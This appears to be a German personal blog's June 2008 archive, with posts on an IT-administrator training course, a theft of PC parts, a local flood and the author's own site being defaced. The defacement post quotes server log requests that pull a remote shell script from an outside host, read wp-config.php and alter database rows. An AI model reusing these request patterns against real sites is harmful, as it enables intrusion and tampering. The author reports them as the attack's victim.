Monthly Archives: Juni 2008

Weiterbildung der IHK IT-Systemadministrator

Posted on by

Wie in einem früherem Beitrag geschrieben, habe ich ja diese Weiterbildung angefangen. Ich möchte einmal einen kurzen Überblick über die Kurse und deren Inhalte geben. Die Kurse finden im Schulungsraum der IHK statt und werden in der Regel von freien Dozenten geführt. Die Koordination erfolgt über eine externe Firma im auftrag der IHK. Während der 14Tägig stattfindenden Kurse wurden bisher folgende Themen behandelt:

  • Grundlagen Windows Server 2003 (4 Tage)
    Manuelle/Automatische Installation des Betriebssystems, Installation von Active Directory, Grundlagen DNS, AD-Replikation, Gruppenrichtlinien, Netzwerkfreigaben, Berechtigungen (NTFS, Share, AD), AD-Verwaltungsstrukturen, Systemsicherheit und Netzwerkgrundlagen.
  • Grundlagen Anwendungsserver (2 Tage)
    WSUS, Dateireplikation, Softwareverteilung, Remoteinstallation, InternetInformation Services, Gruppenrichtlinien, Serverrollen und Remoteverwaltung.
  • Grundlagen U*IX/Linux (4 Tage)
    Entstehungsgeschichte, Dateirechte, Systemdesign, Dateitypen, Dateisysteme, Kernel-Schnitstellen, Installation SuSE Linux, Paketmanagement, INIT-Konzepte und Steuerung, Shellscripting, Benutzer-/Gruppenverwaltung und Systemsicherheit/Updates
  • Telekommunikation (2 Tage)
    Grundlagen Netzwerke, Entstehung der Vermittlingstechnik, Analoge-/Digitale Übertragungstechniken, Netztopologien und Grundlagen der Elektrotechnik.
  • Internetprogrammierung (2 Tage)
    Grundlagen Internetprotokolle, InternetServiceProvider, Rechtliche/Sicherheitstechnische Probleme bei Webanwendungen, Einstieg PHP, Einstieg CSS1, HTML-Editoren (WASIWAG, Text), Webseitenoptimierung, Suchmachinen und diverse Programmieraufgaben (Counter, Gästebuch, Forum, Chat)

Es folgt nun noch der Kurs Datenbanken und ein weiteres Wochenende zur Prüfungsvorbereitung. Dazu werde ich später mehr schreiben.

Während der gesamten Weiterbildung muss ein betriebliches Projekt abgearbeitet und dokumentiert werden. Diese Dokumentation lehnt sich sehr stark an ITIL Richtlinien an. Es müssen die Themen Security-, Fault-, Change-management, Benutzereinweisung/Organisation und Datensicherung in durchschnittlich 10 Punkten erfüllt und Dokumentiert werden. Dazu müssen praktische Fälle und Herangehensweisen bestimmter Einzelprozesse zum jeweiligem Thema Dokumentiert werden. Zusätzlich müssen 4 Reflexionsgespräche, in denen der Status des Projektes besprochen wird, abgehalten werden. Dazu muss jeweils ein Protokoll geschrieben werden.

Zusätzlich zu diesen Arbeiten müssen die Online-Kurse “Projektmanagement” und “Securitymanagement” erfolgreich belegt werden. Dazu müssen nach jedem Kapitel des Online-Kurses mehrere Fragen beantwortet werden.

Gegen Ende der Weiterbildung muss noch eine Art Verteidigung und eine Dokumentation des Projektes vor einer Prüfunkskommision abgehalten werden. Weitere Details dazu werde ich später schreiben.

Rechtschreibfehler dürft ihr behalten :-)

Einbruch in Bürogebäude in Alzenau/Unterfranken

Posted on by

In der Nacht von Freitag, dem 13.06.2008 zum Samstag, dem 14.06.2008 wurde in Alzenau in ein Bürogebäude eingebrochen. Es wurden jediglich Prozessoren und Festplatten verschiedener Typen entwendet. Es waren mehrere Firmen betroffen, ich schätze das mindestens 20 Festplatten und CPU’s entwendet wurden. Die Täter sind Systematisch vorgegangen und haben aus allen PC’s die Festplatten und Prozessoren ausgebaut. Der Vorgang dauerte nur wenige Minuten pro Rechner. Es handelt sich um CPU’s neuerer Bauart (Core2Duo, AthlonX2) oder neuere Festplatten, größe ca. 80 bis 250GB. Sollte ihnen in dieser Region günstig eine solche Komponente über Second Hand, Privatverkauf oder über Händler angeboten, prüfen Sie das Angebot bitte etwas genauer. Sollten Sie den dringenden verdacht haben, das es sich um eine der entwendeten Komponenten handelt, informieren Sie umgehend die Polizei.

Unwetter in Rudolstadt – Land unter

Posted on by

Kaufland ParkplatzEs sah aus wie ein normales Gewitter. Anfangs regnete und Stürmte es nur ein wenig. Da ich Gewitter mag und gerade mit dem Auto unterwegs war, fuhr ich geradewegs in richtung Wolke. Es Regnete als würde die Welt untergehen, mehrere Zentimeter Wasser auf der Straße. Doch plötzlich ein geräusch als würde jemand mit Steinen auf das Auto werfen. Hagel. Na Toll. Also erst einmal in Deckung.B88 Als alles vorüber war, fuhr ich erst einmal Heim, nach Rudolstadt. Doch das war nicht ganz einfach. Sämtliche Straßen waren total verstopft. Hm, das musste ich genauer wissen. Daheim angekommen, Digicam geschnappt und weiter gefahren. Gleich hinter der Wohnung meiner Freundin war ein kleines Tal, aber dort wo normalerweise der kleine Bach fließt, Taalein Reißender Strom. Ich dachte nur, ich brauch Fotos. Nach 5 Bildern war mir auch Klar das der Bach ja normalerweise am Einkaufscenter vorbeifließt. Anschließend unter der B88, einer 4Spurigen Bundesstraße. Also, raus aus dem Auto und zu Fuß in richtung Kaufland. Der Parkplatz war total überflutet. Aber das Wasser lief schonwieder ab. Wohin? Genau. richtung B88. Deshalb auch der Stau, dachte ich mir in diesem Moment. Ich lief über den Parkplatz in Richtung Bundesstraße. Die komplette Straße war überflutet. In der einfahrt zum Kaufland, tobte ein wilder Bach der dort normalerweise nicht hingehört. Das wasser bahnte sich seinen Weg über eine Wiese und spülte die Randbefestigung in Richtung B88. Ich habe hier noch einige fotos geschossen Gulliedeckelund lief dann richtung Rudolstadt. Auf dem weg waren immer wieder Gulliedeckel vom Wasserdruck herausgedrückt. Da der Regen mittlerweile aufgehort hatte waren nur noch eklige dinge aus der Kanalisation und Schlamm zurückgeblieben. Wer da wie ich gerade keine Nasenklammer dabei hat, Nase zu und durch. In Rudolstadt angekommen, waren Feuerwehr und THW damit beschäftigt, die vollgelaufenen Keller trockenzulegen. Auf den Straßen war überall Dreck und Matsch.straßenbefestigung Es wurden zwar Unwetter für Samstag angesagt, dieses Ausmaß hat aber sicher niemand erwartet. Was für ein Samstag.

Die Bilder gibt’s hier im Fotoalbum.

anb-networkz defaced

Posted on by

Screenshot vom Ergebniss der SQL-InjectionAm 30.05.2008 hat es mein kleines Blog erwischt. Eine Person der XTech Group hat doch tatsächlich per SQL-Injection einige Einträge in der WordPress-Datenbank geändert. Zum Glück habe ich ja Backup’s. Das habe ich gleich als Anlass für ein Upgrade auf die aktuelle WPD Version genutzt. Nunja, eigentlich konnte wordpress nichts für den deface. Die Pseudo-hacker nutzten ein Script eines früheren CMS, um die wpp-config.php auszulesen. Anschließend wurden mit einigen SQL-Query’s diverse Datensätze in der MySQL Datenbank geändert. Unter anderem auch der Blog-title und die Blod-Description. Was soll’s. auch ganz lustig anzuschauen waren die Request-Header in den Logfiles des Webservers. Dort ließ sich der deface quasi Nachstellen. Hier einige Einträge:

GET http://anb-networkz.net/html/modules/contact/main.php?this_module_path
=http%3A%2F%2Fwww.mitsubishimania.de%2Fjs%2F1337c99.txt%3F%3F&act=f&
f=wp-config.php&d=%2Fwww%2Fhtdocs%2Fv100329&"
POST /html/modules/contact/main.php?this_module_path=
http%3A%2F%2Fwww.mitsubishimania.de%2Fjs%2F1337c99.txt%3F%3F&
act=sql&sql_login=*******&sql_passwd=**********&
sql_server=localhost&sql_port=3306&sql_db=***&
sql_tbl_act=insert&sql_tbl=wp_options&sql_tbl_ls=0&
sql_tbl_le=30&sql_tbl_insert_q=+%60option_id%60+%3D+
%272%27+AND+%60blog_id%60+%3D+%270%27+AND+%60option_name%
60+%3D+%27blogname%27+AND+%60option_value%60+%3D+
%27..%3A%3AANB-Networkz%3A%3A..%27+AND+%60autoload%60+
%3D+%27yes%27+

Der Aufrufe wurden von 203.162.2.133 ausgelöst, und nutzten Scripte einer (warscheinlich gehackten) website. Da sich dort ein Forum befindet, werde ich das gleich mal dort Posten.

Ich habe nun nur noch WordPress auf diesem Webspace, alle Kennwörter wurden geändert und eine obligatorische Anzeige gegen unbekannt eingereicht. Mal sehen was passiert :-)